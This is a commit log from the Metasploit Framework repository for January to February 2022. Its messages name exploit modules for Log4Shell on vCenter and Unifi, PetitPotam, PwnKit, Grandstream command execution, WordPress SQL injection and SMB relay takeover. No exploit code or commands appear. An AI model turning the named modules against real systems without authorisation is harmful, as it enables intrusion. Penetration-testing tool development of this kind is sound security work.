talhak08 138856765f changed datastore's variable names and edited the documentation. 2022-02-08 04:14:45 +03:00
talhak08 b5e575dd1d Documentation's been added 2022-02-08 03:53:12 +03:00
talhak08 d2b0739d19 Rank's been deleted and fixed check method 2022-02-08 03:43:20 +03:00
talhak08 6955e2b4a2 Fixes 2022-02-08 03:29:49 +03:00
Talha Karakumru 274c48cf77 Microweber v1.2.10 Local File Inclusion (Authenticated) 2022-02-08 02:43:09 +03:00
Metasploit 96c72b0872 automatic module_metadata_base.json update 2022-02-07 16:01:55 -06:00
Spencer McIntyre 2f3e4742f4 Land #16151, Add QEMU Monitor HMP exec module 2022-02-07 16:43:08 -05:00
Jeffrey Martin 52c3d92d14 initial GSoC 2022 updates 2022-02-07 14:57:48 -06:00
Brendan Coles 5bbe934db9 Add QEMU Monitor HMP 'migrate' Command Execution module 2022-02-07 17:48:27 +00:00
Metasploit a554a98965 automatic module_metadata_base.json update 2022-02-07 10:14:21 -06:00
Christophe De La Fuente fa849e51c3 Land #16137, Update PrintNightmare to use the moved DCERPC definitions 2022-02-07 16:54:09 +01:00
Christophe De La Fuente f99438b9d1 Add target security settings info to the documentation 2022-02-07 16:48:34 +01:00
adfoster-r7 4294dcbc80 Land #16143, Fix unknown platform error against windows when using SSH login
Fix unknown platform error against Windows when using SSH Login
2022-02-07 11:50:02 +00:00
Jake Baines 0fcc7e7733 Fixed spelling errors in descriptions 2022-02-06 02:55:17 -08:00
Jake Baines 2e0915fbd4 Fix the Claroty team name 2022-02-06 02:47:43 -08:00
Jake Baines 9758251278 Initial commit of CVE-2021-37343 2022-02-05 18:21:18 -08:00
Spencer McIntyre dcb2f4be4c Improve user list generation for ssh_enumusers 2022-02-04 16:08:30 -05:00
Spencer McIntyre 05b3c3535d Apply rubocop fixes for ssh_enumusers 2022-02-04 15:57:51 -05:00
Metasploit 1fd4bb5b46 automatic module_metadata_base.json update 2022-02-04 14:33:22 -06:00
Spencer McIntyre e2c91ebf30 Land #16010, zabbix_script_exec improvements
This updates the zabbix_script_exec module to work with versions 5.0 and
newer as well as adds a new item-based execution technique.
2022-02-04 15:13:13 -05:00
Spencer McIntyre ae278d0568 Cleanup some minor typos 2022-02-04 15:12:57 -05:00
Metasploit 4215b17d6b automatic module_metadata_base.json update 2022-02-04 13:07:09 -06:00
Christophe De La Fuente 65949cf3c1 Land #16136, Add a port of PetitPotam to Metasploit 2022-02-04 19:45:40 +01:00
Spencer McIntyre b05b7fcb5d Bump ruby_smb to 3.0.2
This pulls in the new DCERPC definitions
2022-02-04 13:14:10 -05:00
Spencer McIntyre bb94115e3a Return nil instead of failing 2022-02-04 13:12:09 -05:00
Spencer McIntyre dd64dcf074 Finish the PetitPotam module with docs 2022-02-04 13:12:08 -05:00
Spencer McIntyre 4cac9cae8d Initial commit of authenticated petit potam 2022-02-04 13:12:08 -05:00
adfoster-r7 d4fec76721 Additional notes on setting up windows 2022-02-04 17:26:49 +00:00
Spencer McIntyre ad1df382e5 Bump ruby_smb to 3.0.2
This pulls in the new DCERPC definitions
2022-02-04 11:50:16 -05:00
sjanusz 3c6cd7cc0a Make platform check case-insensitive 2022-02-04 15:47:15 +00:00
adfoster-r7 4f69089690 Fix to_handler case sensitivity issue 2022-02-04 13:39:07 +00:00
lap1nou 8838d9cb66 Added timeout system, fixed a bug with TLS_PSK, linted 2022-02-04 04:01:23 -08:00
h00die 5f45e40192 update wp-exploitable-plugins 2022-02-03 17:37:27 -05:00
Spencer McIntyre 7cbe70b05c Land #16142, Bump metasploit-payloads to 2.0.72 2022-02-03 16:31:07 -05:00
Spencer McIntyre 965493191f Add and use a Log4Shell mixin 2022-02-03 16:09:49 -05:00
Metasploit c89ecd9c75 Bump version of framework to 6.1.29 2022-02-03 12:07:08 -06:00
Tim W 80a6e2920c Update metasploit-payloads gem to 2.0.72 2022-02-03 13:39:12 +00:00
adfoster-r7 f16815e776 Land #16066, Fix params not being passed to scripts 2022-02-03 12:28:59 +00:00
sjanusz d854751f82 Fix params not being passed to scripts 2022-02-03 11:13:27 +00:00
h00die 11c67ce7d7 wp_modern_events_calendar_sqli 2022-02-02 19:21:42 -05:00
lap1nou 645ef5e71f Fixed few bugs 2022-02-02 14:30:02 -08:00
adfoster-r7 5647e1a94f Add service manager commands to msfconsle 2022-02-02 22:26:41 +00:00
lap1nou 7bf08a28ea Modified default stager 2022-02-02 12:34:07 -08:00
Dhiraj Mishra 30b8e2196b payload_file spaces
Thank you bcoles

Co-authored-by: bcoles <bcoles@gmail.com>
2022-02-02 21:30:13 +04:00
Dhiraj Mishra 2df0f8bf55 delete compiled binary 2022-02-02 20:46:11 +04:00
Metasploit 9cdfac4318 automatic module_metadata_base.json update 2022-02-02 10:09:06 -06:00
Spencer McIntyre 7c987a452d Land #16130, Wordpress RegistrationMagic sqli 2022-02-02 10:50:13 -05:00
Spencer McIntyre dda6c53144 Fix table alignment 2022-02-02 10:48:58 -05:00
dwelch-r7 d9770e1597 Land #16025, Fix msfdb init command failure when opting not to initialize webservices 2022-02-02 11:31:22 +00:00
adfoster-r7 b0e7f10075 Remove documentation link, as it will be generated in the future 2022-02-02 00:49:37 +00:00
adfoster-r7 d9876e889a Land #15994, fix console.read does not return command output 2022-02-01 23:44:48 +00:00
h00die ed7dc1882b updated failed login for registrationmagic 2022-02-01 17:32:34 -05:00
Metasploit 6a287655f8 automatic module_metadata_base.json update 2022-02-01 16:25:22 -06:00
Spencer McIntyre 274b954c58 Land #16123, fix reference URL in cisco_ucs_rce 2022-02-01 17:06:59 -05:00
Spencer McIntyre 06fb748402 Add the missing full disclosure URL reference 2022-02-01 17:06:37 -05:00
lap1nou de32cc0e97 Linted with Rubocop, factorized API call, fixed some grammmar 2022-02-01 13:29:30 -08:00
h00die 00c1ac4da9 updated docs for registrationmagic 2022-02-01 16:17:36 -05:00
Jeffrey Martin 5c47ff0e47 Land #16132, [MySQL injection library] Avoid the use of '<>' 2022-02-01 14:50:55 -06:00
adfoster-r7 8ab102e72c Land #16014, Change custom parsers to Rex Parser and add long arguments 2022-02-01 17:38:51 +00:00
sjanusz c4700ab2f4 Add state to workspace command, extract sevices columns, correct tab-complete 2022-02-01 17:09:17 +00:00
Metasploit 40814c9992 automatic module_metadata_base.json update 2022-02-01 10:55:14 -06:00
space-r7 837fdf7c5e Land #16128, add cisco rv unauth rce 2022-02-01 10:34:57 -06:00
Jake Baines 78312fb300 Update documentation/modules/exploit/linux/http/cisco_rv_series_authbypass_and_rce.md
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2022-02-01 06:41:26 -05:00
Spencer McIntyre b146f098a2 Update to use the moved DCERPC definitions 2022-01-31 09:03:07 -05:00
usiegl00 8bf51dd1d8 Update smb_shadow and shadow_mitm_dispatcher
The dispatcher no longer uses an override flag, Instead the smb_shadow
module explicitly sets the attributes.
2022-01-31 14:49:18 +09:00
Redouane NIBOUCHA 51814a4a8b Refactor the code, using if(CONDITION,sleep(...),0) only 2022-01-30 23:49:07 +00:00
Redouane NIBOUCHA e329d78a46 Use = instead of <> for blind queries (fixes some wordpress plugin SQLis) 2022-01-30 23:01:08 +00:00
h00die b71f9e7e45 wp_plugin RegistrationMagic sqli 2022-01-30 16:08:06 -05:00
Tod Beardsley 0e808ebc5d Update ruby -v check to point to at least Ruby 3, since Ruby 2.5 is no longer supported. 2022-01-30 10:13:19 -08:00
Jake Baines 3371051f11 Switch to using the sqli library 2022-01-30 05:16:01 -08:00
Jake Baines 901adf510f Fixed rubocop issue 2022-01-30 03:54:20 -08:00
Jake Baines 3f719474b2 Merge branch 'grandstream_CVE_2020_5724' of github.com:jbaines-r7/metasploit-framework into grandstream_CVE_2020_5724 2022-01-30 03:48:37 -08:00
Jake Baines 65c296818f Addressed review items 2022-01-30 03:48:31 -08:00
Jake Baines f9c113f63d Addressed various review items 2022-01-30 03:42:15 -08:00
Grant Willcox 3cfbc7fbd1 Fix broken link that lead to a weird French website and not the one we were after. Remove GitHub learning site since apparently they took that link down. Add in Codeademy course on Git since that helped me a lot when I was starting out. Also add in Git Branching tutorial since that helped me out when I was starting out. 2022-01-29 23:01:02 -06:00
Jake Baines ccedcfefab Added exploit for CVE-2021-1472/CVE-2021-1473 2022-01-29 18:56:53 -08:00
Brendan Coles feebf25ad4 Add support for GXV3140 models and ARCH_CMD busybox telnetd payload 2022-01-29 19:38:57 +00:00
Brendan Coles a4fcddca8e Rename to grandstream_gxv31xx_settimezone_unauth_cmd_exec 2022-01-29 19:24:09 +00:00
swapnil shinde 70d4013610 fix faulty URL ref #16078 removed faulty url
fix faulty URL ref #16078 , i searched for FULL_DISC tool in Cisco but i cant find anything related to this so i removed it. if that is meant by the issue.
2022-01-29 22:33:33 +05:30
bcoles 4a81d69716 Updated How to use command stagers (markdown) 2022-01-30 01:45:04 +11:00
bcoles 90f79b67a2 Updated How to use command stagers (markdown) 2022-01-30 01:44:39 +11:00
Metasploit b86d5c5dd1 automatic module_metadata_base.json update 2022-01-29 04:14:36 -06:00
Tim W 73e6c53fbf Land #16119, fix missing comma in slowloris.py 2022-01-29 09:55:47 +00:00
Tim W 613e06a8df Fix exception in rhost during staging 2022-01-29 07:59:22 +00:00
Metasploit 616fff9b8d automatic module_metadata_base.json update 2022-01-28 17:52:37 -06:00
Marek Šuppa c1fefd0856 fix: Missing comma
* Fix missing comma in a list of useragents
2022-01-29 00:51:56 +01:00
adfoster-r7 c3647aa531 Land #16109, Return early if no domains are found 2022-01-28 23:34:49 +00:00
Spencer McIntyre 919185257d Update the URL to the archive for struts2 2022-01-28 16:17:48 -05:00
Spencer McIntyre d46822184f Updates for Log4Shell 2022-01-28 14:56:44 -05:00
Metasploit 81182b4f4a automatic module_metadata_base.json update 2022-01-28 13:03:50 -06:00
Grant Willcox abca10b4db Land #16113, Nops: Add cmd/generic 2022-01-28 12:43:17 -06:00
Grant Willcox c715f9430a Land #16114, prepend_nops: Return unmodified shellcode if no compatible nops for arch 2022-01-28 11:32:18 -06:00
Brendan Coles c30dcf57d0 prepend_nops: Return unmodified shellcode if no compatible nops for arch 2022-01-28 16:15:29 +00:00
Brendan Coles b7b7cdd2d9 Nops: Add cmd/generic 2022-01-28 15:29:56 +00:00
adfoster-r7 7d3bff66f0 Land #16112, Update metasploit-payloads gem to 2.0.71 2022-01-28 14:37:56 +00:00
Spencer McIntyre d340d0da5a Update metasploit-payloads gem to 2.0.71 2022-01-28 08:57:14 -05:00
Brendan Coles 04552d7998 windows/gather/enum_domains: Return early if no domains are found 2022-01-28 11:06:53 +00:00
Brendan Coles 58d98207f1 Land #16110, bump i18n to 1.9.1 2022-01-28 11:03:57 +00:00
adfoster-r7 c2853dce2c Bump i18n dependency 2022-01-28 10:27:36 +00:00
usiegl00 dbc8a70b7c Merge remote-tracking branch 'origin/master' into mitm_dispatcher 2022-01-28 10:24:50 +09:00
usiegl00 0259e586a9 Update smb_shadow module and rename MitmDispatcher
The MitmDispatcher is now the ShadowMitmDispatcher to help prevent name
confusion. Updated the ShadowMitmDispatcher to use native rex lib calls
to decode binary fields.
2022-01-28 08:39:07 +09:00
Grant Willcox 4cb0eb3875 Updated Home (markdown) 2022-01-27 12:51:44 -06:00
Grant Willcox 9396049c8d Add in note about our Rapid7 GitHub website so people can more easily search the site. 2022-01-27 12:51:31 -06:00
Metasploit 50c1f7b775 Bump version of framework to 6.1.28 2022-01-27 12:05:14 -06:00
Metasploit 6c1d1991ca automatic module_metadata_base.json update 2022-01-27 10:37:58 -06:00
bwatters c379a93022 Land #16106, Bump mettle 1.0.18
Merge branch 'land-16106' into upstream-master
2022-01-27 10:15:14 -06:00
bwatters f3f3f8726c update payload cache sizes 2022-01-27 09:18:08 -06:00
bwatters 9e634b9585 Bump metasploit_payloads-mettle to 1.0.18 2022-01-27 08:37:30 -06:00
Dhiraj Mishra 97d83f3fd5 cve_2021_4034_pwnkit_lpe_pkexec.md 2022-01-27 18:32:46 +04:00
Dhiraj Mishra ad190fe80f Spaces at EOL 2022-01-27 12:51:36 +04:00
Dhiraj Mishra 4828bc58e6 Spaces at EOL and Date 2022-01-27 12:43:41 +04:00
Dhiraj Mishra dbca5eeb07 Some linting 2022-01-27 12:32:33 +04:00
adfoster-r7 7fd04ed942 Land #16104, fix crash in portfwd 2022-01-26 22:59:25 +00:00
Spencer McIntyre e10203af1d Bump rex-core to 0.1.25
Pull in the changes from rapid7/rex-core#20
2022-01-26 17:17:44 -05:00
Dhiraj Mishra 6b1c4f4efd Add files via upload 2022-01-26 23:21:16 +04:00
Dhiraj Mishra bfb9882fd4 cve_2021_4034.c 2022-01-26 23:20:55 +04:00
Dhiraj Mishra 4c0340b26c cve_2021_4034_pwnkit_lpe_pkexec 2022-01-26 23:05:36 +04:00
Grant Willcox 397e3aa1c6 Land #16090 - Add in user_data_directory function 2022-01-26 09:31:52 -06:00
Metasploit a05cc02ae4 automatic module_metadata_base.json update 2022-01-26 04:46:44 -06:00
agalway-r7 0e0834302d Land #16099, cleans up smb_relay module via rubocop 2022-01-26 10:28:52 +00:00
adfoster-r7 a17dfcc849 Rubocop smb relay module 2022-01-26 00:47:19 +00:00
Grant Willcox 780c8d3b7f Land #16096, Support session -1 for ListenerComm options 2022-01-24 22:07:23 -06:00
Metasploit 6164fd9c62 automatic module_metadata_base.json update 2022-01-24 21:22:53 -06:00
Grant Willcox 44f040ad78 Land #16056, Exploit Module for Grandstream UCM62xx IP PBX (CVE-2020-5722) 2022-01-24 21:03:46 -06:00
Grant Willcox 15751a0f78 Minor langauge fix and final typo 2022-01-24 21:01:34 -06:00
Metasploit dccea8b250 automatic module_metadata_base.json update 2022-01-24 15:57:33 -06:00
bwatters 3b557c9295 Land #15904, Metasploit-side logic to support a 5th getsystem mechanism
Merge branch 'land-15904' into upstream-master
2022-01-24 15:38:58 -06:00
Spencer McIntyre 12431d8479 Add a client reader for SSH server channels 2022-01-24 14:41:59 -05:00
bwatters 21a2244245 Bump payloads to bring in required changes 2022-01-24 12:44:02 -06:00
Spencer McIntyre dd2d512851 Support session -1 for ListenerComm options 2022-01-24 11:42:39 -05:00
Spencer McIntyre 3cd2b1b929 Update naming for consistency and the module 2022-01-24 10:35:40 -06:00
Ashley Donaldson d088be6fa0 Metasploit-side logic to support a 5th getsystem mechanism 2022-01-24 10:35:40 -06:00
adfoster-r7 8a04b6793a Land #16095, Bump metasploit-payloads to 2.0.69 2022-01-24 15:54:15 +00:00
dwelch-r7 d6b034024f Bump metasploit-payloads to 2.0.69 2022-01-24 14:32:50 +00:00
Jake Baines 04d06a2df1 Switched to proper fail_with calls in exploit failure 2022-01-24 04:13:43 -08:00
h00die b72bdf0b76 Land #16054, updates to JTR compatibility with logging 2022-01-23 14:41:54 -05:00
audibleblink e445a39719 adds user_data_directory 2022-01-23 10:29:01 -05:00
Jake Baines 2c989ec714 Addressed multiple review comments (spelling, doc details, randomization, etc) 2022-01-22 14:09:58 -08:00
Jake Baines 45bd890c2d Update grandstream_ucm62xx_sql_account_guess.rb
Spelling in the description
2022-01-22 15:55:30 -05:00
Jake Baines a253470623 Update grandstream_ucm62xx_sql_account_guess.md
Fix spelling
2022-01-22 15:54:40 -05:00
Jake Baines 642b04ca45 Merge branch 'rapid7:master' into grandstream_CVE_2020_5724 2022-01-22 15:38:55 -05:00
Jake Baines e7198f7e20 Module for dumping the users table from Grandstream UCM62xx IP PBX before 1.20.22 2022-01-22 04:10:35 -08:00
Metasploit 982893dfbf automatic module_metadata_base.json update 2022-01-21 13:09:41 -06:00
Grant Willcox d064bbe9a5 Land #16053, Log4Shell Unifi Controller RCE 2022-01-21 12:51:38 -06:00
Spencer McIntyre 458d584f83 Add details to check codes and PR feedback 2022-01-21 09:40:23 -05:00
usiegl00 5cc716fa0d Add MitmDispatcher to the smb_shadow module
The MitmDispatcher reduces code repetition and enables the use of
standard RubySMB syntax. I have noticed increased power draw when using
the new dispatcher compared to the previous (less stateful) approach.
2022-01-21 14:57:07 +09:00
wvu-r7 a468e157b2 Remove myself 2022-01-20 19:43:26 -06:00
Metasploit ddb33384bb automatic module_metadata_base.json update 2022-01-20 13:13:35 -06:00
Grant Willcox 1186529204 Land #16020, Adding Modbus Service Device ID 0x2B 2022-01-20 12:53:37 -06:00
Grant Willcox 05fe2fadbb Apply RuboCop rules to modbusclient.rb 2022-01-20 12:23:01 -06:00
Grant Willcox 577f5f81b9 Fix up spacing errors and fix a potential OOB reference issue 2022-01-20 12:14:51 -06:00
Metasploit eccac8df4f Bump version of framework to 6.1.27 2022-01-20 12:07:12 -06:00
Metasploit d621111432 automatic module_metadata_base.json update 2022-01-20 11:24:25 -06:00
Grant Willcox a1bca89899 Land #16075, post/multi/manage/sudo: Abort if session type is Meterpreter 2022-01-20 11:05:40 -06:00
VanSnitza 899fbfcb85 Update modbusclient.rb 2022-01-20 17:36:02 +01:00
VanSnitza b3fb678055 Update modules/auxiliary/scanner/scada/modbusclient.rb
Co-authored-by: Grant Willcox <63261883+gwillcox-r7@users.noreply.github.com>
2022-01-20 17:16:24 +01:00
Spencer McIntyre 579627f5c7 Update docs, note OS X support 2022-01-20 10:47:11 -05:00
VanSnitza 2f76c602f2 Update modbusclient.rb 2022-01-20 16:37:11 +01:00
Spencer McIntyre ba469a4b2c Add version detection to the Unifi exploit 2022-01-20 09:26:48 -05:00
Brendan Coles c17c2636ae post/osx/gather/hashdump: Add 'meterpreter' to supported SessionTypes 2022-01-20 13:11:24 +00:00
Brendan Coles a31052afbd post/multi/manage/sudo: Abort if session type is Meterpreter 2022-01-20 12:44:29 +00:00
VanSnitza 0765b1ffb1 Update modules/auxiliary/scanner/scada/modbusclient.rb
Co-authored-by: Grant Willcox <63261883+gwillcox-r7@users.noreply.github.com>
2022-01-20 11:42:06 +01:00
Metasploit d52f039fa6 automatic module_metadata_base.json update 2022-01-19 16:51:50 -06:00
Spencer McIntyre 3d80a46e67 Check the HTTP response from the trigger 2022-01-19 17:51:31 -05:00
Spencer McIntyre ef344d9d12 Add the Unifi Log4Shell RCE exploit 2022-01-19 17:51:31 -05:00
bwatters 4cf3ae352c Land #16050, Log4Shell: vCenter RCE
Merge branch 'land-16050' into upstream-master
2022-01-19 16:30:33 -06:00
Grant Willcox bccee15c97 Land #15991, Unlock pcaprub 2022-01-19 16:03:44 -06:00
Jeffrey Martin 238113d93d unlock pcaprub
Updated gem has been released with Ruby 3 support.
2022-01-19 15:35:02 -06:00
Grant Willcox a7bb8d0480 Land #16029, Fix OptPath options with empty strings 2022-01-19 13:08:34 -06:00
Metasploit 4067ced73d automatic module_metadata_base.json update 2022-01-19 11:19:12 -06:00
Grant Willcox 8bb3e39fd7 Land #16036, Add Grandstream GXV3175 'settimezone' Unauthenticated Command Execution 2022-01-19 10:58:42 -06:00
Metasploit 92f7043e56 automatic module_metadata_base.json update 2022-01-19 10:45:25 -06:00
Grant Willcox 66cff164cf Land #16063, local_admin_search_enum: Fix typo: @domain_controller 2022-01-19 10:24:59 -06:00
sjanusz 158a0aa30c Change custom parser to Rex, add custom opt, add tabcomplete 2022-01-19 13:01:33 +00:00
Brendan Coles ee2feb1207 Add Grandstream GXV3175 'settimezone' Unauthenticated Command Execution 2022-01-19 00:04:15 +00:00
namaenonaimumei 4bb292497f Merge pull request #2 from h00die/landing-16054
cracker refactor around jtr
2022-01-19 07:43:04 +09:00
Metasploit 8943704319 automatic module_metadata_base.json update 2022-01-18 16:34:27 -06:00
bwatters bed80e1ee5 Land #15727, Add error handing to rdp_web_login.py to handle malformed NetNTLM messages
Merge branch 'land-15727' into upstream-master
2022-01-18 16:14:07 -06:00
Spencer McIntyre c446e83e67 Parse the NTLM Type 1 message 2022-01-18 16:43:10 -05:00
Grant Willcox 50eabd3de0 Add further input validation 2022-01-18 16:43:10 -05:00
Grant Willcox bbc789e91a Apply additional error handling and improve quality of error messages 2022-01-18 16:43:10 -05:00
Alex 9c83c7c2b7 Added error handling to catch malformed NTML hashes
As mentioned in #15720 with some NTML responses the code crashes, unable to enumerate the domain. To prevent this behavior a try and except block was added, to inform the user about the crash.
2022-01-18 16:43:10 -05:00
Metasploit 1931df766e automatic module_metadata_base.json update 2022-01-18 14:07:21 -06:00
Grant Willcox 8852eaa6b8 Land #16049 - Reference Fixes 2022-01-18 13:46:25 -06:00
Brendan Coles c29e30c58e local_admin_search_enum: Fix typo: @domain_controller 2022-01-18 15:08:30 +00:00
h00die f6d3788d25 fix spec for cracker 2022-01-18 04:42:49 -05:00
Metasploit 7a49a91110 automatic module_metadata_base.json update 2022-01-18 01:16:39 -06:00
Tim W dd66b83f39 Land #16058, fix stack trace in local_exploit_suggester when session is invalid 2022-01-18 06:55:22 +00:00
h00die d01594a570 spec not working quite right 2022-01-17 17:40:35 -05:00
h00die 7a7b009161 add more smarts to nolog for jtr 2022-01-17 15:33:41 -05:00
h00die 3a66a9a899 Updated Hashes and Password Cracking (markdown) 2022-01-17 11:41:31 -05:00
h00die cefe3007da fix --no-log vs --nolog 2022-01-17 11:39:01 -05:00
shoxxdj 57efcefe82 improve wordpress_scanner module 2022-01-17 11:32:48 +01:00
Brendan Coles 2bb5edac9e local_exploit_suggester: Print session_host if session is valid 2022-01-16 03:24:41 +00:00
Jake Baines 4ebb702405 Added an exploit for Grandstream UCM62xx IP PBX (CVE-2020-5722) 2022-01-15 12:46:56 -08:00
Metasploit ad9517b81d Bump version of framework to 6.1.26 2022-01-14 09:32:56 -06:00
Spencer McIntyre 96a5d656bd Final cleanups and reference updates 2022-01-14 08:41:37 -05:00
namaenonaimumei 85aab39dbd Fix syntax error for --nolog 2022-01-14 07:14:47 +09:00
Spencer McIntyre 3f04b80d8b Add vCenter Log4Shell docs 2022-01-13 14:50:28 -05:00
Metasploit e4fa044cbf automatic module_metadata_base.json update 2022-01-13 13:35:39 -06:00
space-r7 383ada6ae2 Land #16016, fix RHOSTS in dcerpc scanner 2022-01-13 13:15:24 -06:00
Pedro Ribeiro 053fbe2a28 fix cisco advisory links 2022-01-13 18:55:39 +00:00
Pedro Ribeiro ea00da0a03 fix NUUO advisory links 2022-01-13 18:54:56 +00:00
Pedro Ribeiro 09d6b1388c fix kaseya links 2022-01-13 18:47:11 +00:00
Pedro Ribeiro b08e22a153 fix nvrmini reset link 2022-01-13 18:43:41 +00:00
Spencer McIntyre d5c83b41f9 Cleanup the vCenter Log4Shell exploit 2022-01-13 11:57:00 -05:00
Spencer McIntyre 7b1398f0ae Allow overriding check module datastore options 2022-01-13 11:51:39 -05:00
Metasploit 3cb35e0590 automatic module_metadata_base.json update 2022-01-13 10:30:34 -06:00
Christophe De La Fuente e10331b22d Land #15656, Allow authenticated user creation in vmware_vcenter_vmdir_auth_bypass 2022-01-13 17:04:12 +01:00
shoxxdj 42142a4ba4 add option to retrieve users from wordpress API 2022-01-13 16:56:23 +01:00
Spencer McIntyre 62a814fa59 Refactor Log4shell exploit code into reusable bits 2022-01-13 09:45:02 -05:00
Spencer McIntyre e093154865 Refactor the BeanFactory gadget code 2022-01-12 16:58:31 -05:00
Spencer McIntyre e873907d13 Initial vCenter exploit via Log4Shell 2022-01-12 15:34:45 -05:00
Hynek Petrak 471aaffad3 Merge pull request #4 from cdelafuente-r7/vcenter_exploit_fix 2022-01-12 21:07:22 +01:00
Metasploit 5fcc580f72 automatic module_metadata_base.json update 2022-01-12 13:43:56 -06:00
space-r7 435e79aaef Land #16041, add SonicWALL cmd injection 2022-01-12 13:23:57 -06:00
adfoster-r7 6223ee671f Land #16045, fix msftidy error in pihole_domains_api_exec 2022-01-12 16:19:48 +00:00
adfoster-r7 64d97193b3 Land #16043, Fix wordpress scanner crash when scanning themes 2022-01-12 16:16:57 +00:00
Christophe De La Fuente b0743e15d9 Update documentation and fix vulnarable/non-vulnerable status message 2022-01-12 16:51:40 +01:00
Metasploit a7919f0dcd automatic module_metadata_base.json update 2022-01-12 09:41:13 -06:00
space-r7 4065e61951 fix msftidy error in pihole_domains_api_exec 2022-01-12 09:34:15 -06:00
space-r7 199eae5e99 Land #16012, add pi-hole aux module and lib 2022-01-12 09:21:11 -06:00
Pedro Ribeiro 489aad47cf Merge branch 'rapid7:master' into master 2022-01-12 20:27:55 +07:00
shoxxdj 372c4782a2 bugfix in files loop 2022-01-12 09:31:38 +01:00
space-r7 bb00575acb add command for starting docker env 2022-01-11 17:07:36 -06:00
Metasploit f509e0955e automatic module_metadata_base.json update 2022-01-11 16:11:28 -06:00
Spencer McIntyre 877bab6f2a Land #15969, Log4j2 HTTP Header Injection Exploit 2022-01-11 16:52:08 -05:00
Spencer McIntyre 7b64383040 Preemptively tweak references to ysoserial 2022-01-11 16:25:21 -05:00
Christophe De La Fuente e8208c60b9 Land #16027, Fix the generate command's tab completion for -o and -f 2022-01-11 18:03:37 +01:00
Jake Baines 264f2bc03f Added the AttackerKB analysis 2022-01-11 03:17:45 -08:00
Jake Baines b0941f746f Added link to R7 blog 2022-01-10 13:24:33 -08:00
Jake Baines d4ee9a0183 Initial commit of CVE-2021-20039 exploit 2022-01-10 12:43:50 -08:00
adfoster-r7 4c0133d26d Land #16040, remove ruby 2.5 support 2022-01-10 19:06:02 +00:00
Jeffrey Martin 67e7695c34 revert #16026 with Ruby 2.5 removal 2022-01-10 12:11:42 -06:00
Jeffrey Martin 370d0b4bc0 remove ruby 2.5 support
Update the project to officially drop Ruby 2.5.
2022-01-10 12:06:44 -06:00
Metasploit 9c1316d3a4 Bump version of framework to 6.1.25 2022-01-10 09:35:41 -06:00
lap1nou cb616b94c7 Removed some useless parameter + fixed a few bugs 2022-01-09 13:08:25 -08:00
RageLtMan 6a7c81e1ba Update authors 2022-01-08 21:56:15 -05:00
h00die 43549488fe peer review comments 2022-01-08 15:26:47 -05:00
lap1nou 53c2400be9 Added cleaning procedure + fixed few mistakes/error mesage, removed unused docs 2022-01-08 10:56:31 -08:00
Metasploit 8e6fa39a93 automatic module_metadata_base.json update 2022-01-08 06:29:32 -06:00
h00die 7b11429b49 Land #12217, f5_bigip_cookie_disclosure module now stores the cookie in noteswq 2022-01-08 07:03:35 -05:00
lap1nou ccc90b0330 Linted doc+module, added support for 6.x version, aded support for TLS and item RCE, improved payload management 2022-01-07 17:40:15 -08:00
Spencer McIntyre 3f15c9ecc1 Writeup the module docs 2022-01-07 17:30:39 -05:00
Spencer McIntyre 9b03d0272a Add check and auto-HTTP_HEADER capabilities 2022-01-07 17:30:39 -05:00
Spencer McIntyre 6198d9653d Remove the REMOTE_LOAD datastore option
The necessary value can be inferred by the target and it's payload
compatibility so just set it intelligently.
2022-01-07 17:30:39 -05:00
Spencer McIntyre f56f328c8d Use an enum for the YSoSerial payload option 2022-01-07 17:30:39 -05:00
Spencer McIntyre 3cb70c01bf Cleanup typos, make module aggressive 2022-01-07 17:30:39 -05:00
adfoster-r7 1d3a6d51ca Land #16021, Add check for deleting directories to post/test/file 2022-01-07 21:05:35 +00:00
Metasploit 6bd94dce06 automatic module_metadata_base.json update 2022-01-07 14:48:04 -06:00
Spencer McIntyre 5164a7697c Land #16034, Last minute fix for SMB Shadow module 2022-01-07 15:28:51 -05:00
Christophe De La Fuente a458961631 Move the cleanup instance variables to the begining of #exploit 2022-01-07 20:34:58 +01:00
adfoster-r7 f3d4cfe9ab Land #16032, Explicitly specify encoding for doc builds 2022-01-07 18:39:13 +00:00
adfoster-r7 fa3ec4a1b8 [skip ci] Explicitly specify encoding for doc builds 2022-01-07 18:21:38 +00:00
adfoster-r7 27f0624d57 Use ascii characters 2022-01-07 18:01:25 +00:00
adfoster-r7 e7166313d8 Use spaces for characters 2022-01-07 17:55:21 +00:00
adfoster-r7 6712b12511 Align quote usage 2022-01-07 17:47:05 +00:00
adfoster-r7 af888f1af0 Align quote usage 2022-01-07 17:44:26 +00:00
h00die 4df91dd3ec f5 big-ip module and doc updates 2022-01-07 12:17:43 -05:00
Paul-Emmanuel Raoul 89ec0a8434 Add the output of 'notes' to the documentation 2022-01-07 12:17:43 -05:00
Paul-Emmanuel Raoul fcb2a06a98 Remove an unnecessary line in the documentation 2022-01-07 12:17:43 -05:00
Paul-Emmanuel Raoul 411e062738 Change domain name example in verification steps 2022-01-07 12:17:43 -05:00
Paul-Emmanuel Raoul dfa75c6bca Update some descriptions and output messages 2022-01-07 12:17:43 -05:00
Paul-Emmanuel Raoul 17ec7c6255 Add documentation 2022-01-07 12:17:43 -05:00
Paul-Emmanuel Raoul dd6768f174 Fix the last style issue 2022-01-07 12:17:43 -05:00
Paul-Emmanuel Raoul b8e7c327cf Update references 2022-01-07 12:17:43 -05:00
Paul-Emmanuel Raoul 8e5a977aab Remove redundant characters in the cookie regex
The metacharacter '\w' already contains numbers and underscores.
2022-01-07 12:17:43 -05:00
Paul-Emmanuel Raoul 32d12385c6 Fix more style issues 2022-01-07 12:17:43 -05:00
Paul-Emmanuel Raoul 5d00c4106d Fix some style issues 2022-01-07 12:17:43 -05:00
Paul-Emmanuel Raoul fd74b260b7 Add myself to the authors 2022-01-07 12:17:43 -05:00
Paul-Emmanuel Raoul da049a4d22 Store the cookie name, pool name and route domain
The cookie name, pool name and route domain are now stored in the
database as notes since they can contain useful recon information.

See https://github.com/rapid7/metasploit-framework/issues/12187.
2022-01-07 12:17:43 -05:00
dwelch-r7 91c3b9aa87 Land #16024, Add command to kill all Meterpreter channels 2022-01-07 16:28:38 +00:00
Metasploit 7820048669 automatic module_metadata_base.json update 2022-01-07 10:17:23 -06:00
Christophe De La Fuente 41ebb3aa29 Land #15903, SMB Shadow Module: Direct SMB Session Takeover 2022-01-07 16:57:17 +01:00
adfoster-r7 8e847a01c6 Land #16030, exclude root docs path only not any file 2022-01-07 15:33:56 +00:00
Jeffrey Martin cd8971da2a exclude root docs path only not any file 2022-01-07 09:02:14 -06:00
